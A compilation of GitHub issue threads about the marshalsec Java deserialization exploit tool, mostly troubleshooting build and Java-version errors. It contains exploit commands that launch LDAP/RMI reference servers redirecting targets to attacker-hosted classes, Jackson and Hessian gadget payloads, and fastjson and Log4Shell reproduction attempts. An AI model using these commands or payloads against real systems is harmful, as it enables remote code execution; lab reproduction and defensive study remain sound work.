When i try the comment: java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "10.10.17.153:8000/#Exploit"

I get these Errors:
java.net.MalformedURLException: no protocol: 10.10.17.153:8000/#Exploit
at java.base/java.net.URL.(URL.java:674)
at java.base/java.net.URL.(URL.java:569)
at java.base/java.net.URL.(URL.java:516)
at marshalsec.jndi.LDAPRefServer.main(LDAPRefServer.java:76)

I think its because of the java version:

openjdk version "17.0.6" 2023-01-17
OpenJDK Runtime Environment (build 17.0.6+10-Debian-1deb11u1)
OpenJDK 64-Bit Server VM (build 17.0.6+10-Debian-1deb11u1, mixed mode, sharing)

But i wasnt able to run:
sudo apt-get install openjdk-8-jre
...
Paket openjdk-8-jre is not available,...
However, the following packages replace it:
nvidia-openjdk-8-jre

I installed the nvidia paket but i couldnt changed my java version:
sudo update-java-alternatives -l
java-1.11.0-openjdk-amd64 1111 /usr/lib/jvm/java-1.11.0-openjdk-amd64
java-1.17.0-openjdk-amd64 1711 /usr/lib/jvm/java-1.17.0-openjdk-amd64
java-1.8.0-openjdk-amd64 1081 /usr/lib/jvm/java-1.8.0-openjdk-amd64

sudo update-java-alternatives -s /usr/lib/jvm/java-1.8.0-openjdk-amd64

But i get these errors:
update-alternatives: error: no alternatives... many of no alternatives.

How i can fix this or run the LDAP-Server?

i cannot find marshalsec-0.0.3-SNAPSHOT-all.jar

ERROR] The goal you specified requires a project to execute but there is no POM in this directory (/home/kali). Please verify you invoked Maven from the correct directory. -> [Help 1]

Exception in thread "main" java.lang.IllegalAccessError

Issue
Hessian service doesnt like the payload generated

Payload generation Command
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Hessian SpringAbstractBeanFactoryPointcutAdvisor rmi://x.x.x.x:1099 > rmi_payload

My Payload in Hex

4D740000 4D740041 6F72672E 73707269 6E676672 616D6577 6F726B2E 616F702E 73757070 6F72742E 44656661 756C7442 65616E46 6163746F 7279506F 696E7463 75744164 7669736F 7253000E 61647669 63654265 616E4E61 6D655300 19726D69 3A2F2F78 2E782E78 2E783A31 30393953 00056F72 6465724E 53000870 6F696E74 6375744D 7400246F 72672E73 7072696E 67667261 6D65776F 726B2E61 6F702E54 72756550 6F696E74 6375747A 53000B62 65616E46 6163746F 72794D74 00366F72 672E7370 72696E67 6672616D 65776F72 6B2E6A6E 64692E73 7570706F 72742E53 696D706C 654A6E64 69426561 6E466163 746F7279 53000B72 65736F75 72636552 65665453 00127368 61726561 626C6552 65736F75 72636573 56740011 6A617661 2E757469 6C2E4861 73685365 746C0000 00015300 19726D69 3A2F2F78 2E782E78 2E783A31 3039397A 53001073 696E676C 65746F6E 4F626A65 6374734D 7400007A 53000D72 65736F75 72636554 79706573 4D740000 7A530006 6C6F6767 65724D74 00276F72 672E6170 61636865 2E636F6D 6D6F6E73 2E6C6F67 67696E67 2E696D70 6C2E4E6F 4F704C6F 677A5300 0C6A6E64 6954656D 706C6174 654D7400 256F7267 2E737072 696E6766 72616D65 776F726B 2E6A6E64 692E4A6E 64695465 6D706C61 74655300 066C6F67 6765724D 7400276F 72672E61 70616368 652E636F 6D6D6F6E 732E6C6F 6767696E 672E696D 706C2E4E 6F4F704C 6F677A53 000B656E 7669726F 6E6D656E 744E7A7A 7A520000 00014D74 00416F72 672E7370 72696E67 6672616D 65776F72 6B2E616F 702E7375 70706F72 742E4465 6661756C 74426561 6E466163 746F7279 506F696E 74637574 41647669 736F7253 000E6164 76696365 4265616E 4E616D65 4E530005 6F726465 724E5300 08706F69 6E746375 74520000 00025300 0B626561 6E466163 746F7279 4E7A5200 00000A7A

Server Detail
Hessian Server Version on my Server: 4.0.7

Looks like Hessian doesnt like the first byte 4d.

I get the following error when i use a python program to send the payload. (I do take care to prepend the H\x02\x02C bytes at the begining of the payload)

Apr 16, 2020 9:37:21 PM org.apache.catalina.core.StandardWrapperValve invoke
SEVERE: Servlet.service() for servlet [remoting] in context with path [/service] threw exception [Hessian skeleton invocation failed; nested exception is com.caucho.hessian.io.HessianProtocolException: expected string at 0x4d] with root cause
com.caucho.hessian.io.HessianProtocolException: expected string at 0x4d
	at com.caucho.hessian.io.Hessian2Input.error(Hessian2Input.java:2882)
	at com.caucho.hessian.io.Hessian2Input.expect(Hessian2Input.java:2830)
	.......

@mbechler Any suggestions?

Dear community members,

I am running the Kali subsystem under my Windows system, and executing the following commands:

To reproduce the fastjson 1.2.24 vulnerability, I downloaded marshalsec via sudo git clone https://github.com/mbechler/marshalsec.git.

Next, I installed Maven using sudo apt-get install maven.

Then, I compiled marshalsec using mvn clean package -DskipTests.

I ran the command java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://192.168.1.7:8888/#TouchFile 2335, and sent the data packet through bp, after which I received the following output:

• Opening JRMP listener on 2335
  Have connection from /192.168.1.8:43528
  Reading message...
  Is RMI.lookup call for TouchFile 2
  Sending remote classloading stub targeting http://192.168.1.7:8888/TouchFile.class
  Closing connection
  Exception in thread "main" java.lang.IllegalAccessError: class marshalsec.jndi.RMIRefServer (in unnamed module @0x4015e7ec) cannot
  access class com.sun.jndi.rmi.registry.ReferenceWrapper (in module jdk.naming.rmi) because module jdk.naming.rmi does not export
  com.sun.jndi.rmi.registry to unnamed module @0x4015e7ec
  at marshalsec.jndi.RMIRefServer.handleRMI(RMIRefServer.java:321)
  at marshalsec.jndi.RMIRefServer.doCall(RMIRefServer.java:280)
  at marshalsec.jndi.RMIRefServer.doMessage(RMIRefServer.java:226)
  at marshalsec.jndi.RMIRefServer.run(RMIRefServer.java:171)
  at marshalsec.jndi.RMIRefServer.main(RMIRefServer.java:117)

The target machine's IP is 192.168.1.8, and the fastjson vulnerability environment is set up using vulhub (https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.24-rce).

The IP of the Kali subsystem is 192.168.1.7, and its Java environment version is 17.0.6 2023-01-17:

java --version

openjdk 17.0.6 2023-01-17

OpenJDK Runtime Environment (build 17.0.6+10-Debian-1)

OpenJDK 64-Bit Server VM (build 17.0.6+10-Debian-1, mixed mode, sharing)

As I am not very familiar with Java, I am unsure how to correct this error. Any advice or suggestions would be greatly appreciated. Thank you very much for your assistance.

Nice work @mbechler, thank you!
I was trying to get the Jackson exploit to work with an LDAP remote codebase. I see you have an example LDAPServer which we can use, but I'm not sure what to use as the argument when starting to make the Jackson Marshal work. Can you give more details for that?
Here's what I tried:
Terminal 1:
java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer file://marshalsec.gadgets#JdbcRowSet
Output:
Listening on 0.0.0.0:1389

Terminal 2:

java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.Jackson -v -t SpringAbstractBeanFactoryPointcutAdvisor ldap://localhost:1389

Output:

["java.util.HashSet",[["org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor",{"beanFactory":["org.springframework.jndi.support.SimpleJndiBeanFactory",{"shareableResources":["ldap://localhost:1389"]}],"adviceBeanName":"ldap://localhost:1389"}],["org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor",{}]]]


Running gadget SpringAbstractBeanFactoryPointcutAdvisor:
Failed to achieve RCE:Did not trigger RCE
org.springframework.beans.factory.BeanNotOfRequiredTypeException: Bean named 'ldap://localhost:1389' is expected to be of type 'org.aopalliance.aop.Advice' but was actually of type 'com.sun.jndi.ldap.LdapCtx'
	at org.springframework.jndi.support.SimpleJndiBeanFactory.getBean(SimpleJndiBeanFactory.java:122)
...
com.fasterxml.jackson.databind.deser.impl.TypeWrappedDeserializer.deserialize(TypeWrappedDeserializer.java:63)
	at com.fasterxml.jackson.databind.ObjectMapper._readMapAndClose(ObjectMapper.java:3789)
	at com.fasterxml.jackson.databind.ObjectMapper.readValue(ObjectMapper.java:2833)
	at marshalsec.Jackson.unmarshal(Jackson.java:78)
	at marshalsec.Jackson.unmarshal(Jackson.java:53)
	at marshalsec.MarshallerBase.test(MarshallerBase.java:238)
	at marshalsec.MarshallerBase.doRun(MarshallerBase.java:188)
	at marshalsec.MarshallerBase.run(MarshallerBase.java:121)
	at marshalsec.Jackson.main(Jackson.java:262)

Hi i have found the same issue as the earlier tickets before it is closed

I want to know why this warning is shown

In order to make this tool easily usable on all systems, without installing prerequisites like java or maven, it'd be nice to have a dockerized version

I have a simple rmi client:

import java.io.*;
import javax.naming.*;
import java.rmi.registry.*;

public class rmiClient {
    public static void main(String[] args) throws Exception {
        Registry registry = LocateRegistry.getRegistry("127.0.0.1", 1099);
        registry.lookup("test");
    }
}

And I started the reference server with JDK8u11

/home/jdk/8u11/bin/java -cp marshalsec.jar marshalsec.jndi.RMIRefServer 'http://127.0.0.1#TEST.class' 1099
* Opening JRMP listener on 1099

When I invoke the rmi client, marshalsec outputs the following:

Have connection from /127.0.0.1:47636
Reading message...
Is RMI.lookup call for wtf 2
Sending remote classloading stub targeting http://127.0.0.1/TEST/class.class
Closing connection

No request is sent to http://127.0.0.1 (from nginx access log) and the rmi client is stuck.

What was wrong? FYI: ysoserial.exploit.JRMPListener works fine

WARNING: An illegal reflective access operation has occurred
WARNING: Illegal reflective access by marshalsec.util.Reflections (file:/root/MMD/fastjson/marshalsec-0.0.3-SNAPSHOT-all.jar) to field com.sun.jndi.rmi.registry.ReferenceWrapper.wrappee
WARNING: Please consider reporting this to the maintainers of marshalsec.util.Reflections
WARNING: Use --illegal-access=warn to enable warnings of further illegal reflective access operations
WARNING: All illegal access operations will be denied in a future release

I have been trying to recreate Log4j exploit and couldnt i launch the server and it says this

Error: Could not find or load main class marshalsec.jndi.LDAPRefserver

I dont know if its me installing Marhalsec wrong or its the thing it self wrong but i would appreciate some help

Thanks.

I'm trying to reproduce the exploit of CVE-2021-44228.
All is done and when i run the request, the LDAP server shows me
"Send LDAP reference result for Log4jRCE redirecting to myAddress:port/Log4JRCE.class"

but the python server does not shows the GET request and the code into the Log4jRCE.class is not fetched from the target machine.
The server is correctly up, and the link myAddress:port/Log4jRCE.class redirects me to the binary code correctly.

it seems that marshalsec tool and python webserver does not communicates.

What it could be??
Thank you for the support

Could you kindly add an MIT license on the RMIRefServer.java in specific then the whole project folder.

Hi dude,

Thanks for your amazing work first. I just wondered if you had plans for integrating XMLDecoder marshaller in your tool or you considered it too simple ?

Would you be interested in a pull-request ?

Thanks

On my test minecraft server where I runned the "command", I get this

root@vmi651682:~/downloads/marshalsec# java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8885/exp.class"
Error: Could not find or load main class marshalsec.jndi.LDAPRefServer
Caused by: java.lang.ClassNotFoundException: marshalsec.jndi.LDAPRefServer
root@vmi651682:~/downloads/marshalsec#

Hi there,

I just did a fresh build with mvn clean package -DskipTests (master branch)

And it's missing manifest

%> java -jar target/marshalsec-0.0.3-SNAPSHOT-all.jar
no main manifest attribute, in target/marshalsec-0.0.3-SNAPSHOT-all.jar

Can you take a look at the pom.xml?

Hi, do you have compiled version? can you put it to release version, because for compiling need to download more dependencies?

Hello, I really like your project it is great! but ( :-( ) i ran into a problem wile running your exploit test using Castor serializer.
When running the gadget of JNDI
I've set it up just as you've shown, using the provided LDAP server with a exploit.class just as you've shown in one of your issue responses.
The LDAP server returns the URL address as expected but then, there is no request to the HTTP server.
Even when I try your -t flag it says RCE achieved but the HTTP server won't recieve any communication.
Sorry for the bad english, Thanks!

I try to use use this marshaller’s hessian Gadget SpringAbstractBeanFactoryPointcutAdvisor in version spring-aop:3.2.7,
And I met such error while deserialize:

Line 83:

It looks like that because of adviceMonitor is transient so it is null, do you have any advice to solve this problems?

Hi,

im currently trying to generate/test all payloads for the Jackson Marshaller with the following command:

java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Jackson -a

The first two payloads are shown but then i always get Exception messages telling that the java Access for System Modules is denied. Also tried running as root, seams to be a java policy/configuration problem. Also tried different systems, same behaviour.

Do i have to change the default java configuration to get all payloads generated or am i missing some argument for the tool?

java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Jackson -a

["org.springframework.beans.factory.config.PropertyPathFactoryBean",{"targetBeanName":"ldap://localhost:1389/obj","propertyPath":"foo","beanFactory":["org.springframework.jndi.support.SimpleJndiBeanFactory",{"shareableResources":["ldap://localhost:1389/obj"]}]}]

["java.util.HashSet",[["org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor",{"beanFactory":["org.springframework.jndi.support.SimpleJndiBeanFactory",{"shareableResources":["ldap://localhost:1389/obj"]}],"adviceBeanName":"ldap://localhost:1389/obj"}],["org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor",{}]]]
java.lang.reflect.InvocationTargetException
        at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
        at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
        at java.base/jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
        at java.base/java.lang.reflect.Method.invoke(Method.java:564)
        at marshalsec.MarshallerBase.createObject(MarshallerBase.java:331)
        at marshalsec.MarshallerBase.doRun(MarshallerBase.java:165)
        at marshalsec.MarshallerBase.runAll(MarshallerBase.java:147)
        at marshalsec.MarshallerBase.run(MarshallerBase.java:115)
        at marshalsec.Jackson.main(Jackson.java:289)
Caused by: java.security.AccessControlException: access denied ("java.lang.RuntimePermission" "accessSystemModules")
        at java.base/java.security.AccessControlContext.checkPermission(AccessControlContext.java:472)
        at java.base/java.security.AccessController.checkPermission(AccessController.java:895)
        at java.base/java.lang.SecurityManager.checkPermission(SecurityManager.java:335)
        at marshalsec.SideEffectSecurityManager.checkPermission(SideEffectSecurityManager.java:76)
        at java.base/jdk.internal.module.SystemModuleFinders$SystemModuleReader.checkPermissionToConnect

Hi, marshalsec,
I wonder if you know about these gadgets which can be exploited in their constructor?
for example:
class A{
A(){
context.lookup(xxxx)
}
}

Thanks!

I recently used this project in a Docker container successfully.

Would you accept a PR that adds a Dockerfile?

Hello,

I get the following error when compiling on Kali:

[ERROR] /opt/marshalsec/src/main/java/marshalsec/gadgets/JDKUtil.java:[52,24] package javax.activation does not exist

Adding the following block to the <dependencies> section of the pom.xml file does the trick:

<dependency>
    <groupId>javax.activation</groupId>
    <artifactId>activation</artifactId>
    <version>1.1.1</version>
</dependency>

Cheers!

java -cp target/marshalsec-0.0.3-SNAPSHOT.jar marshalsec.jndi.RMIRefServer http://127.0.0.1/#Calc 8088

I have downloaded the repo, ran the following command, and received this output. Where do I find the Marshaller or do I need to create this directory somewhere?

java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://x.x.x.x:8888/#Exploit"

zsh: no such file or directory: Marshaller

I don't know java at all, im learning c and python3 (bad combo) but I its saying Jackson not found, however maven said the build was successful, so then i use it and it says Jackson not found, Im on ubuntu 18 on the windows thing. Thanks for your help!

java -cp marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.JsonIO -t Groovy whoami

Running gadget Groovy:
Had execution of whoami

When the marshalsec gets the request, it displays the message and should refer the request to the http server. But the http server shows no requests. Am i doing it wrong??

java version "1.8.0_181"
Java(TM) SE Runtime Environment (build 1.8.0_181-b13)
Java HotSpot(TM) 64-Bit Server VM (build 25.181-b13, mixed mode)